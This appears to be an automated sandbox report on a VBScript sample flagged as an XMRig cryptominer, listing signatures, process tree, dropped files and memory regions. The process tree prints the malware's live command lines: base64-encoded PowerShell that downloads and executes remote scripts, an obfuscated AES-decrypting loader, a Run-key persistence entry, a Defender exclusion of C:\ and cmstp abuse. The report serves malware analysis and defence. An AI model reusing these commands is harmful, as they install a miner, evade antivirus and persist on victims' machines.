Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    94s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/01/2025, 01:40

General

  • Target

    sample.vbs

  • Size

    12.7MB

  • MD5

    f7650386857dd0d31fb2a1e984dfd3b5

  • SHA1

    f273746309e4dff543059ec934895108dd2b6244

  • SHA256

    acdcc9515147f1691ddb2c7cbd352a67ef6f0e57cb72ea593df2bd2fe01f0509

  • SHA512

    e8421e56ed514f38780d4c4d3261810c3b7374c3afad7016de0ef50905dba12d2661206162865da93ada5eeb733d9ed985fd2a4f205ee248a2ca3a3fa5607616

  • SSDEEP

    49152:BnxqEP6D/zp8K91y5+30k5xTZq+4+EtVGnKTSB4IpQsBtK+gvA9hZKwPBdko9cgD:C

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3436
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sample.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3604
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3552
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5064
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1788
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iut3spxi\iut3spxi.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4396
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE7B.tmp" "c:\Users\Admin\AppData\Local\Temp\iut3spxi\CSC6128D959D41645FD86A0D9B0EA34BC3.TMP"
                  7⤵
                    PID:4596
                • C:\windows\system32\cmstp.exe
                  "C:\windows\system32\cmstp.exe" /au C:\windows\temp\mgojeem5.inf
                  6⤵
                    PID:3468
                • C:\Windows\system32\reg.exe
                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
                  5⤵
                  • Adds Run key to start application
                  PID:4976
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0JFMEw2aUN3N3crTnBhVzcwNktsZ01UN3pxMkZHYXlReFkrWElkaHA4SEE9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdmNGV6a1NJa2RhN1Ewcmk5R2VtSVF3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIoJHBhcmFtX3Zhcil7CUlFWCAnJGRwd3RreGtyZWx6emFxc2FmbWRneWt6ZGQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHhqaGt0dHB0cWp6bHRoaGhoZ2psc3Z3bHU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZHB3dGt4a3JlbHp6YXFzYWZtZGd5a3pkZCwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5Db3B5VG8oJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQpOwkkeGpoa3R0cHRxanpsdGhoaGhnamxzdndsdS5EaXNwb3NlKCk7CSRkcHd0a3hrcmVsenphcXNhZm1kZ3lremRkLkRpc3Bvc2UoKTsJJGF5enl4ZHJzdWdnaWtwcmx6ZnB5Y3VhbGQuRGlzcG9zZSgpOwkkYXl6eXhkcnN1Z2dpa3BybHpmcHljdWFsZC5Ub0FycmF5KCk7fWZ1bmN0aW9uIGFhd2ZqaGN5cG1yZ2ZzcWdraGlhaG5zdG1iam1hcWZmdGxuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeWZrZWFmeW91enVraWJucXB0Z3NhZnhpcXZvcXpsYm12cHVuZm9xZD1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiPSR5ZmtlYWZ5b3V6dWtpYm5xcHRnc2FmeGlxdm9xemxibXZwdW5mb3FkLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGF4eWhueHpmdnZjYnF0dXNoYm5lcmhvanlob3NoemthZGNyY2hwdXN3anVkaWF3Y3ZiLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbHpwaWprZmVjcGJtdnBsdnVybnlhYWlsbSA9ICRlbnY6VVNFUk5BTUU7JG5lYnBrbnZqa2Fmb2N4eHh2Y2d2cnZld3kgPSAnQzpcVXNlcnNcJyArICRsenBpamtmZWNwYm12cGx2dXJueWFhaWxtICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbmVicGtudmprYWZvY3h4eHZjZ3ZydmV3eTskcHdkbWo9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRuZWJwa252amthZm9jeHh4dmNndnJ2ZXd5KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkcXJ3IGluICRwd2RtaikgewlpZiAoJHFydy5TdGFydHNXaXRoKCc6OicpKQl7CQkkcmFmcXY9JHFydy5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ249W3N0cmluZ1tdXSRyYWZxdi5TcGxpdCgnXCcpO0lFWCAnJGZmdWFwZ3ltYW5uYXlnYWdtaWhjeHFlYmh3cWhmeWhza3lvPWZqbXNjcXVhYmZ3b2NjYXpjaW1rdmVlenB3cmtheGN2cWRkZHZrcXIgKGdlY3RpbWNkZ2JqbG9semtpcXJqbWhjdGh4cXh6Z21udWVrYmluYW4gKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkYWZ4YWRhaGt6cnJocmx1bmFtYmlyZG90endkcWN0dGpwZ25bMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaWdsbWJzcW9nbHZma2NuaGJoZHBvYXNzc3BxaGNmdnB6cnI9Zmptc2NxdWFiZndvY2NhemNpbWt2ZWV6cHdya2F4Y3ZxZGRkdmtxciAoZ2VjdGltY2RnYmpsb2x6a2lxcmptaGN0aHhxeHpnbW51ZWtiaW5hbiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRhZnhhZGFoa3pycmhybHVuYW1iaXJkb3R6d2RxY3R0anBnblsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTthYXdmamhjeXBtcmdmc3Fna2hpYWhuc3RtYmptYXFmZnRsbiAkZmZ1YXBneW1hbm5heWdhZ21paGN4cWViaHdxaGZ5aHNreW8gJG51bGw7YWF3ZmpoY3lwbXJnZnNxZ2toaWFobnN0bWJqbWFxZmZ0bG4gJGlnbG1ic3FvZ2x2ZmtjbmhiaGRwb2Fzc3NwcWhjZnZwenJyICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
                  5⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4704
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            2⤵
            • Power Settings
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-ac 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:2068
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:4556
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-ac 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:3604
            • C:\Windows\System32\powercfg.exe
              powercfg /x -standby-timeout-dc 0
              3⤵
              • Power Settings
              • Suspicious use of AdjustPrivilegeToken
              PID:2896
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
          1⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:460
        • C:\Windows\system32\taskkill.exe
          taskkill /IM cmstp.exe /F
          1⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4736

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          435B

          MD5

          d91cc95681316fdbfc1ea45a514c7084

          SHA1

          e24f78646cc43faa2532c097f3e08c8c25bc488f

          SHA256

          813a85b2e53da1c46406fe6b258d5fa7eba5fed31fe450562cae268a6f397b99

          SHA512

          8fb32e225af55040e1e3dbd0d6f8a812bb0c546027a2415b31405943b3a394e8d34cbd952ca62c70a419ebf22768e0d1a492169677b5d28c9289833ffb207ecc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          30f6f06e92c7da43807f0c6be8fa743f

          SHA1

          f6c096eee6227a5e3b2d63f1fcc833a4487e2e05

          SHA256

          e22d6c4444a75f7fafe8e2638d6ac7ee1e77e3b52b490e26186f80d35e8c596b

          SHA512

          23b9bf9ef741da9dce810ee6872c77a9856787bb4d28dff8656f4ca10e55bda4ea32616b71feeec9ee5d35af66537083d2d6d6297d821d99257efb96e18f9be6

        • C:\Users\Admin\AppData\Local\Temp\RESCE7B.tmp

          Filesize

          1KB

          MD5

          22efb0d247d2c9b8bfd00f696a4ce304

          SHA1

          84fe2a2b153ef0043ad62de5a81f7bff0e42b75f

          SHA256

          652f88c22fe56afda4620dc258beb58d19d583c6fba8acbdae5d0babf0adf42b

          SHA512

          ec6f865f7ac197a2848a9b1dab5e39e7567cd77ba1287ade5802e8913ab7cbe7deb206f449cb82c1b3968c22b5d289a074eaf3a4b1b5c765d667e79e06917e65

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sjwgml1v.bpp.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\c.bat

          Filesize

          12.7MB

          MD5

          7a1c7d3da7cf792dda3fcb171347daa1

          SHA1

          fb4f7291f1e8c2d807f34e2e43f2bfa343f219a1

          SHA256

          f03344def4aff1dafd24bd5a4e5c6e505a92a1c30c6bf3d11de9fea8cf187a39

          SHA512

          bf3372f65d5019d08804ac0a5d2df16a25e7d11670f2bfdd332ca83d4e34fae5ca752a34b3158e1bafda34e018a3a4d0dcc64fbf6cff6326fa2ea916d4d44d21

        • C:\Users\Admin\AppData\Local\Temp\iut3spxi\iut3spxi.dll

          Filesize

          4KB

          MD5

          a2473efbc67dbcef6dc00dce296aeebd

          SHA1

          0eb01bb42481405f317f1647e2722c4b80ab7e06

          SHA256

          da88c7b5495a042a891011dcc4f1d7a7f57fd37cd43463313e6e4ecb6b35f18c

          SHA512

          3257c4960d4e75888eeaa7510a3d78eccc8a0713a6817264aa82fcc0814812169483f9af88177d95a2d86a29a14f80b42b7a53bd305f3e555fef5ada6733e022

        • C:\windows\temp\mgojeem5.inf

          Filesize

          667B

          MD5

          05662b83ff7db6317e391454787598d8

          SHA1

          d290d661e282eb757a5292fe5ee8f2f8517232ab

          SHA256

          0322b78214d9fb1d40d9bf162a44f9a5fe13fcb21c96b8b0f0e289e939a9fa5c

          SHA512

          f1b302c58804c79e350cd2f30a2f08f762551cc8790ed3f0b877efd8915996587734afe9f0b4185cfbbcf589aa9b04762dd80d9d8141a5bf647de692299161e9

        • \??\c:\Users\Admin\AppData\Local\Temp\iut3spxi\CSC6128D959D41645FD86A0D9B0EA34BC3.TMP

          Filesize

          652B

          MD5

          2d3792000c593539f5a23d6c7b8566fd

          SHA1

          52fe9316528985c1892ed36e702d07790c9b3672

          SHA256

          ddff3c666658b1c83cdb4fee094b38a80f127303b985771ace13f79ce151b610

          SHA512

          1c4e93adb2e968c140d8dc8a22702633267041afc6c0767662d495bc4bac02b86f1ef504b7abb5e7e856ee4aa801321c04eb9546f12d78fb2e5635fc7c33ea81

        • \??\c:\Users\Admin\AppData\Local\Temp\iut3spxi\iut3spxi.0.cs

          Filesize

          2KB

          MD5

          b126ac3da39ffa35cb857267cbc70cbb

          SHA1

          59dbfa9af3f2fa2c3bda0118ef779c0238675721

          SHA256

          6e6dd39153a84b94b4f309a4c4521260cbdd8a6922ade46096f42da39bc20b93

          SHA512

          c15d8ef56529792b983d55736c283ad6ae5c95bcd661053292f95c51f535109e4c59cf391e1c724be97e52ee4bfa213a380021f51c4e576201c03cfc4647acbc

        • \??\c:\Users\Admin\AppData\Local\Temp\iut3spxi\iut3spxi.cmdline

          Filesize

          369B

          MD5

          e8f03ce6a42fb8b153e28b3b9075d47c

          SHA1

          d5ebd869611350b21125bd4c99cbe938b2f769af

          SHA256

          6363889388599ca85b586951d21893d2416792e93c7fcc9ff24c89d85c459659

          SHA512

          a55898dd118765e29ce2140adaaa6e4d9f0578eced03585114cfe82adf9b288e96b0d29fcd4fd1bd2c53b865035a8c25ef0259a15fc34aa2adf5d4b6e40d37ef

        • memory/1788-49-0x00007FFB5BBD3000-0x00007FFB5BBD5000-memory.dmp

          Filesize

          8KB

        • memory/1788-5-0x000001B95E910000-0x000001B95E932000-memory.dmp

          Filesize

          136KB

        • memory/1788-32-0x000001B95F160000-0x000001B95F168000-memory.dmp

          Filesize

          32KB

        • memory/1788-17-0x000001B95F560000-0x000001B95FD06000-memory.dmp

          Filesize

          7.6MB

        • memory/1788-19-0x000001B95F1B0000-0x000001B95F1CC000-memory.dmp

          Filesize

          112KB

        • memory/1788-50-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

        • memory/1788-15-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

        • memory/1788-16-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

        • memory/1788-54-0x00007FFB5BBD0000-0x00007FFB5C691000-memory.dmp

          Filesize

          10.8MB

        • memory/1788-4-0x00007FFB5BBD3000-0x00007FFB5BBD5000-memory.dmp

          Filesize

          8KB

        • memory/2464-75-0x00000000011A0000-0x00000000011C0000-memory.dmp

          Filesize

          128KB

        • memory/2464-76-0x00007FF7281E0000-0x00007FF728A20000-memory.dmp

          Filesize

          8.2MB

        • memory/4704-69-0x0000023558000000-0x0000023558008000-memory.dmp

          Filesize

          32KB

        • memory/4704-70-0x0000023558010000-0x0000023558998000-memory.dmp

          Filesize

          9.5MB

        • memory/4704-71-0x0000023538000000-0x0000023539000000-memory.dmp

          Filesize

          16.0MB